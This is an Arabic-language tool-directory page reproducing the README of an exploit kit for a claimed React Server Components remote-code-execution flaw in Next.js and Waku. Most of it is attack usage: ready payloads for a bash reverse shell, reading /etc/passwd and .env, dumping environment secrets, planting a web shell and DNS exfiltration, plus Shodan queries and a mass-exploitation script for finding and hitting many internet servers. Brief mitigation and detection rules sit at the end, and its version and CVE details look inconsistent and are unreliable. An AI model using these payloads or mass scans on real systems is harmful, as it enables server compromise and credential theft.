Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PoC-RCE-CVE-2025-55182 — مجموعة أدوات متقدمة لاستغلال ثغرات RCE لمكونات خادم React. تتضمن حمولات جاهزة متعددة، وتكامل مع Shodan لاكتشاف الأهداف، ومسح ضخم لاختبار الاختراق المصرح به. | Kitploit
أدوات/GitHubGitHub/ilixm/poc-rce-cve-2025-55182
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالقيادة والسيطرةالفريق الأحمرأداة الوصول عن بعدتطوير الحمولات
GitHubilixm/poc-rce-cve-2025-55182
3منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

PoC-RCE-CVE-2025-55182

مجموعة أدوات متقدمة لاستغلال ثغرات RCE لمكونات خادم React. تتضمن حمولات جاهزة متعددة، وتكامل مع Shodan لاكتشاف الأهداف، ومسح ضخم لاختبار الاختراق المصرح به.

عرض المستودع

🔥 مجموعة أدوات استغلال RSC RCE

Version License Node Platform

مجموعة أدوات متقدمة لاستغلال ثغرات تنفيذ الأكواد عن بُعد (RCE) في مكونات خادم React

لاختبار الاختراق المصرح به والبحث الأمني فقط

الميزات • التثبيت • الاستخدام • التكامل مع Shodan • أمثلة • إخلاء المسؤولية


📋 جدول المحتويات

  • نظرة عامة
  • تفاصيل الثغرة
  • الميزات
  • التثبيت
  • البدء السريع
  • الاستخدام
    • الاستغلال الأساسي
    • الحمولات المتاحة
    • الحمولات المخصصة
  • التكامل مع Shodan
  • المسح الآلي
  • أمثلة
  • التخفيف
  • الإصدارات المتأثرة
  • المساهمة
  • إخلاء المسؤولية
  • الترخيص

🎯 نظرة عامة

تستغل هذه المجموعة ثغرة تنفيذ الأكواد عن بُعد (RCE) حرجة في تطبيقات مكونات خادم React (RSC)، وتستهدف تحديدًا:

  • Next.js (الإصدارات 13.4.0 - 14.1.0)
  • Waku (الإصدارات الضعيفة)

تعتمد الثغرة على تلوث النماذج الأولية (Prototype Pollution) وإلغاء التسلسل غير الآمن في آلية معالجة البيانات لـ RSC لتحقيق تنفيذ تعليمات برمجية عشوائية على الخادم.

🔴 الخطورة: حرجة

  • درجة CVSS: 9.8 (حرجة)
  • متجه الهجوم: شبكة
  • الصلاحيات المطلوبة: لا شيء
  • تفاعل المستخدم: لا شيء
  • التأثير: اختراق كامل للخادم

🔬 تفاصيل الثغرة

الخلفية التقنية

تستخدم مكونات خادم React تنسيق تسلسل مخصص لنقل البيانات بين العميل والخادم. توجد الثغرة في كيفية إلغاء تسلسل هذه الأطر ومعالجة الحمولات المعدة خصيصًا.

سلسلة الهجوم:

  1. بناء الحمولة: صياغة حمولة RSC خبيثة بمراجع دائرية
  2. تلوث النموذج الأولي: إساءة استخدام $X:constructor:constructor للوصول إلى منشئ الدالة (Function constructor)
  3. حقن الأكواد: حقن كود JavaScript عشوائي في حقل _prefix
  4. التنفيذ: يقوم الخادم بإلغاء تسلسل الحمولة وتنفيذها

تدفق الاستغلال

root@kitploit:~
المهاجم → حمولة RSC خبيثة → الخادم المستهدف
                                         ↓
                              إلغاء التسلسل غير الآمن
                                         ↓
                              الوصول إلى سلسلة النموذج الأولي
                                         ↓
                              منشئ الدالة
                                         ↓
                              ⚠️ تحقق RCE ⚠️

✨ الميزات

القدرات الأساسية

  • ✅ دعم أطر متعددة: Next.js و Waku
  • ✅ 8 حمولات مبنية مسبقًا: من إثبات المفهوم إلى الصدفات العكسية الكاملة
  • ✅ تنفيذ أكواد مخصصة: حقن أي كود JavaScript
  • ✅ التكامل مع Shodan: اكتشاف الأهداف تلقائيًا
  • ✅ المسح الجماعي: اختبار أهداف متعددة تلقائيًا
  • ✅ واجهة أوامر احترافية: واجهة سطر أوامر كاملة
  • ✅ تسجيل مفصّل: مخرجات ملونة مع طوابع زمنية
  • ✅ معالجة الأخطاء: إدارة أخطاء قوية

الحمولات المبنية مسبقًا


📦 التثبيت

المتطلبات الأساسية

  • Node.js >= 16.0.0
  • npm أو yarn
  • Shodan CLI (اختياري، للمسح الآلي)

استنساخ المستودع

root@kitploit:~
git clone https://github.com/yourusername/rsc-rce-exploit.git
cd rsc-rce-exploit

تثبيت التبعيات

root@kitploit:~
npm install
# أو
yarn install

إعداد Shodan (اختياري)

root@kitploit:~
# تثبيت Shodan CLI
pip install shodan

# التهيئة باستخدام مفتاح API الخاص بك
shodan init YOUR_API_KEY

🚀 البدء السريع

1. فحص الثغرة الأساسي

root@kitploit:~
node rsc-rce-exploit.js --target http://vulnerable-target.com --payload console

2. الحصول على صدفة عكسية

root@kitploit:~
# بدء المستمع
nc -lvnp 4444

# تنفيذ الاستغلال
node rsc-rce-exploit.js \
  --target http://vulnerable-target.com \
  --payload reverseShell \
  --lhost 10.10.14.5 \
  --lport 4444

3. تنفيذ أمر مخصص

root@kitploit:~
node rsc-rce-exploit.js \
  --target http://vulnerable-target.com \
  --payload execCommand \
  --command "whoami"

📖 الاستخدام

الاستغلال الأساسي

root@kitploit:~
node rsc-rce-exploit.js [options]

الخيارات

*مطلوب إما --payload أو --custom

الحمولات المتاحة

عرض جميع الحمولات:

root@kitploit:~
node rsc-rce-exploit.js --list

الإخراج:

root@kitploit:~
📋 الحمولات المتاحة:

  console              - إثبات مفهوم أساسي - إخراج وحدة التحكم
    الكود: console.log(7*7+1)

  reverseShell         - صدفة عكسية (bash)
    الكود: require('child_process').exec('bash -c "bash -i >& /dev/tcp/LHOST/LPORT 0>&1"')

  readFile             - قراءة /etc/passwd
    الكود: console.log(require('fs').readFileSync('/etc/passwd','utf8'))

  envDump              - تفريغ متغيرات البيئة
    الكود: console.log(JSON.stringify(process.env,null,2))

  execCommand          - تنفيذ أمر نظام
    الكود: console.log(require('child_process').execSync('COMMAND').toString())

  webshell             - كتابة صدفة ويب إلى /tmp
    الكود: require('fs').writeFileSync('/tmp/shell.js','...')

  exfilPackage         - قراءة package.json
    الكود: console.log(require('fs').readFileSync('./package.json','utf8'))

  dnsExfil             - تسريب DNS
    الكود: require('dns').resolve4(Buffer.from(process.env.SECRET||'nosecret')...)

الحمولات المخصصة

تنفيذ أي كود JavaScript:

root@kitploit:~
node rsc-rce-exploit.js \
  --target http://target.com \
  --custom "require('fs').readdirSync('.').forEach(f=>console.log(f))"

🌐 التكامل مع Shodan

استعلامات Shodan

أهداف Next.js

root@kitploit:~
# Next.js أساسي
http.component:"Next.js"

# Next.js مع RSC
http.html:"__next" http.html:"RSC"

# وضع التطوير Next.js (أكثر عرضة)
http.html:"__NEXT_DATA__" http.html:"development"

# Next.js مستضاف ذاتيًا (ليس على Vercel)
http.component:"Next.js" -org:"Vercel"

# مستهدف جغرافيًا (فرنسا)
http.component:"Next.js" country:FR

# المزيج النهائي لاختبار الاختراق
http.component:"Next.js" http.status:200 country:FR -org:"Vercel" port:3000,8080

أهداف Waku

root@kitploit:~
# إطار Waku
http.html:"waku" http.html:"RSC"

# نقاط نهاية Waku RSC
http.path:"/RSC/"

المسح الآلي عبر Shodan

استخدم سكريبت الأتمتة المرفق:

root@kitploit:~
# مسح واختبار تلقائيًا
./shodan-scanner.sh "http.component:\"Next.js\" country:FR" 100

# مع حمولة مخصصة
./shodan-scanner.sh "http.component:\"Next.js\"" 50 envDump

سير العمل اليدوي مع Shodan

root@kitploit:~
# 1. البحث في Shodan
shodan search 'http.component:"Next.js" country:FR' \
  --fields ip_str,port,org,hostnames \
  --limit 100 > targets.txt

# 2. اختبار كل هدف
while read -r line; do
    ip=$(echo $line | awk '{print $1}')
    port=$(echo $line | awk '{print $2}')
    echo "[*] اختبار http://$ip:$port"
    node rsc-rce-exploit.js \
      --target "http://$ip:$port" \
      --payload console
done < targets.txt

🤖 المسح الآلي

سكريبت الاستغلال الجماعي

تتيح أداة mass-exploit.js اختبار أهداف متعددة:

root@kitploit:~
# من ملف
node mass-exploit.js --file targets.txt --payload console --threads 10

# من Shodan
node mass-exploit.js --shodan "http.component:\"Next.js\"" --limit 50 --payload envDump

# حفظ النتائج
node mass-exploit.js --file targets.txt --payload console --output results.json

التكامل في CI/CD

مثال لاختبار أمني آلي:

root@kitploit:~
# .github/workflows/security-test.yml
name: اختبار أمان RSC
on: [push]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - run: npm install
      - run: node rsc-rce-exploit.js --target http://staging.example.com --payload console

💡 أمثلة

مثال 1: إثبات مفهوم أساسي

root@kitploit:~
node rsc-rce-exploit.js \
  --target https://vulnerable.example.com \
  --payload console

الإخراج المتوقع:

root@kitploit:~
╔═══════════════════════════════════════════════════════════╗
║           RSC RCE Exploit - Enhanced Version              ║
║         React Server Components Code Execution            ║
╚═══════════════════════════════════════════════════════════╝

[*] بدء الاستغلال...
[*] استهداف نقطة نهاية Next.js RSC...
[*] URL: https://vulnerable.example.com
[*] الحمولة: console.log(7*7+1)...
[+] حالة الاستجابة: 200
[+] جسم الاستجابة:
50
[*] اكتمل الاستغلال!

مثال 2: تسريب متغيرات البيئة

root@kitploit:~
node rsc-rce-exploit.js \
  --target https://api.target.com \
  --payload envDump

النتيجة:

  • تفريغ جميع متغيرات process.env
  • مفيد لاستخراج:
    • بيانات اعتماد قاعدة البيانات
    • مفاتيح API
    • أسرار AWS
    • أسرار JWT

مثال 3: الصدفة العكسية

root@kitploit:~
# الطرفية 1: بدء المستمع
nc -lvnp 4444

# الطرفية 2: تنفيذ الاستغلال
node rsc-rce-exploit.js \
  --target https://vulnerable.example.com \
  --payload reverseShell \
  --lhost 10.10.14.5 \
  --lport 4444

مثال 4: نشر صدفة ويب

root@kitploit:~
node rsc-rce-exploit.js \
  --target https://vulnerable.example.com \
  --payload webshell

# الوصول إلى صدفة الويب
curl "http://vulnerable.example.com:9999/cmd?c=whoami"

مثال 5: تسريب DNS (أعمى)

root@kitploit:~
# إعداد Burp Collaborator أو خادم DNS الخاص بك
node rsc-rce-exploit.js \
  --target https://vulnerable.example.com \
  --custom "require('dns').resolve4('$(whoami).your-burp.com',()=>{})"

مثال 6: إطار Waku

root@kitploit:~
node rsc-rce-exploit.js \
  --target https://waku-app.example.com \
  --framework waku \
  --endpoint /RSC/custom.txt \
  --payload execCommand \
  --command "id"

مثال 7: تسريب الملفات

root@kitploit:~
# قراءة ملفات حساسة
node rsc-rce-exploit.js \
  --target https://vulnerable.example.com \
  --custom "console.log(require('fs').readFileSync('.env','utf8'))"

🛡️ التخفيف

للمطورين

  1. تحديث الإطار

    root@kitploit:~
    npm install next@latest
    # أو
    npm install waku@latest
    
  2. التحقق من الإدخال

    root@kitploit:~
    // التحقق من جميع حمولات RSC
    function validateRSCPayload(payload) {
      // تنفيذ تحقق صارم
      if (payload.includes('constructor')) return false;
      if (payload.includes('__proto__')) return false;
      return true;
    }
    
  3. سياسة أمان المحتوى (CSP)

    root@kitploit:~
    // next.config.js
    module.exports = {
      async headers() {
        return [{
          source: '/:path*',
          headers: [
            { key: 'X-Frame-Options', value: 'DENY' },
            { key: 'X-Content-Type-Options', value: 'nosniff' },
          ],
        }]
      },
    }
    
  4. تعطيل RSC في الإنتاج (إذا لم يكن مطلوبًا)

    root@kitploit:~
    // next.config.js
    module.exports = {
      experimental: {
        serverActions: false,
      },
    }
    

لفرق الأمان

  • 🔍 المراقبة لطلبات RSC المشبوهة
  • 🚨 التنبيه عند استخدام رأس next-action
  • 🔒 قواعد WAF لمنع محاولات تلوث النموذج الأولي
  • 📊 تحليل السجلات لمحاولات الاستغلال

قواعد الكشف

قاعدة YARA:

root@kitploit:~
rule RSC_RCE_Exploit {
    strings:
        $s1 = "constructor:constructor"
        $s2 = "_prefix"
        $s3 = "$@"
        $s4 = "resolved_model"
    condition:
        3 of them
}

قاعدة Snort:

root@kitploit:~
alert tcp any any -> any any (msg:"RSC RCE Attempt"; content:"next-action"; http_header; content:"constructor:constructor"; http_client_body; sid:1000001;)

🎯 الإصدارات المتأثرة

Next.js

Waku

نطاق الإصدارالحالةملاحظات
< 0.18.0⚠️ عرضةRCE حرج
>= 0.18.0✅ تم التصحيحيوصى بالتحديث

🤝 المساهمة

نرحب بالمساهمات! يرجى اتباع هذه الإرشادات:

  1. انسخ (Fork) المستودع
  2. أنشئ فرع ميزة (git checkout -b feature/amazing-feature)
  3. قم بتنفيذ التغييرات (git commit -m 'إضافة ميزة رائعة')
  4. ادفع إلى الفرع (git push origin feature/amazing-feature)
  5. افتح طلب سحب (Pull Request)

أفكار للمساهمة

  • إضافة قوالب حمولات أكثر
  • تنفيذ قوالب Nuclei
  • دعم أطر RSC إضافية
  • تحسين التكامل مع Shodan
  • إضافة وظائف للتقارير (PDF/HTML)
  • إنشاء حاوية Docker للمجموعة

⚖️ إخلاء المسؤولية

root@kitploit:~
⚠️ إخلاء المسؤولية القانوني ⚠️

هذه المجموعة مقدمة لاختبار الاختراق المصرح به والبحث الأمني فقط.

باستخدام هذا البرنامج، فإنك توافق على ما يلي:

1. اختبار الأنظمة التي تملكها فقط أو التي لديك إذن كتابي صريح لاختبارها
2. الامتثال لجميع القوانين المحلية والولائية والوطنية والدولية المعمول بها
3. عدم استخدام هذه الأداة لأغراض ضارة أو أنشطة غير قانونية
4. تحمل المسؤولية الكاملة عن أفعالك

المؤلفون والمساهمون:
- ليسوا مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة
- لا يشجعون أو يوافقون على النشاط غير القانوني
- يقدمون هذه الأداة "كما هي" دون أي ضمان من أي نوع

الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.

سيتم مقاضاة المخالفين إلى أقصى حد يسمح به القانون بموجب:
- قانون الاحتيال وإساءة استخدام الكمبيوتر (CFAA) - الولايات المتحدة
- قانون إساءة استخدام الكمبيوتر - المملكة المتحدة
- اتفاقية الجرائم الإلكترونية الأوروبية
- وقوانين أخرى سارية في منطقتك القضائية

الاستخدام على مسؤوليتك الخاصة.

📄 الترخيص

هذا المشروع مرخص بموجب ترخيص MIT - راجع ملف LICENSE للحصول على التفاصيل.

root@kitploit:~
MIT License

حقوق الطبع والنشر (c) 2024 المساهمون في RSC RCE Exploit

يُمنح الإذن، مجانًا، لأي شخص يحصل على نسخة
من هذا البرنامج والملفات الوثائقية المرتبطة به ("البرنامج")، للتعامل
في البرنامج دون قيود، بما في ذلك على سبيل المثال لا الحصر الحقوق
في الاستخدام والنسخ والتعديل والدمج والنشر والتوزيع والترخيص، و/أو بيع
نسخ من البرنامج، والسماح للأشخاص الذين يتم تزويدهم بالبرنامج
بالقيام بذلك، وفقًا للشروط التالية:

يجب تضمين إشعار حقوق الطبع والنشر أعلاه وإذن الإذن هذا في جميع
النسخ أو الأجزاء الجوهرية من البرنامج.

يتم توفير البرنامج "كما هو"، دون أي ضمان من أي نوع، صريح أو
ضمني، بما في ذلك على سبيل المثال لا الحصر ضمانات القابلية للتسويق،
والملاءمة لغرض معين وعدم الانتهاك. في أي حال من الأحوال لا يكون
المؤلفون أو أصحاب حقوق الطبع والنشر مسؤولين عن أي مطالبة أو أضرار أو غيرها
من المسؤولية، سواء في إجراء تعاقدي أو تقصيري أو غير ذلك، الناشئة عن
أو فيما يتعلق بالبرنامج أو استخدامه أو التعاملات الأخرى في
البرنامج.

🔗 الموارد

الوثائق الرسمية

  • إجراءات خادم Next.js
  • مكونات خادم React
  • وثائق Waku

البحث الأمني

  • تحليل ثغرة إلغاء التسلسل في RSC
  • تلوث النموذج الأولي في JavaScript
  • أفضل ممارسات أمان Next.js

CVEs ذات الصلة

  • CVE-2024-XXXXX (عنصر نائب - أضف CVE حقيقي عند توفره)

📬 الاتصال

  • قضايا GitHub: الإبلاغ عن الأخطاء أو طلب الميزات
  • قضايا الأمان: [email protected]
  • تويتر: @yourhandle

⭐ إذا ساعدتك هذه الأداة في بحثك الأمني، يرجى منحها نجمة! ⭐

صُنع بحب ❤️ من قبل باحثي أمن، لباحثي الأمن

⬆ العودة إلى الأعلى

تنزيل الأداة
الحمولةالوصفحالة الاستخدام
consoleإثبات مفهوم أساسي (console.log)التحقق من الثغرة
reverseShellصدفة عكسية Bashالوصول الأولي
readFileقراءة /etc/passwdالوصول إلى نظام الملفات
envDumpتفريغ متغيرات البيئةاستخراج بيانات الاعتماد
execCommandتنفيذ أوامر النظامتنفيذ أوامر عشوائية
webshellنشر صدفة ويب Expressوصول دائم
exfilPackageتسريب package.jsonتحليل التبعيات
dnsExfilتسريب DNS (خارج النطاق)الاستغلال الأعمى
الخيارالوصفمطلوب
--target <url>URL الهدف✅
--framework <name>الإطار: next أو waku❌ (الافتراضي: next)
--payload <name>اسم الحمولة (انظر أدناه)✅*
--custom <code>كود JavaScript مخصص✅*
--lhost <ip>IP الخاص بك (للصدفة العكسية)❌
--lport <port>المنفذ الخاص بك (للصدفة العكسية)❌
--command <cmd>الأمر المراد تنفيذه❌
--endpoint <path>نقطة نهاية RSC مخصصة (Waku)❌
--action-id <id>معرف next-action مخصص❌
--listقائمة الحمولات المتاحة❌
--verboseإخراج مفصّل❌
--helpعرض المساعدة❌
نطاق الإصدارالحالةملاحظات
< 13.4.0✅ غير متأثرRSC غير مفعل افتراضيًا
13.4.0 - 13.4.19⚠️ عرضةRCE حرج
13.5.0 - 14.0.4⚠️ عرضةRCE حرج
14.1.0⚠️ عرضةتخفيف جزئي
>= 14.1.1✅ تم التصحيحيوصى بالتحديث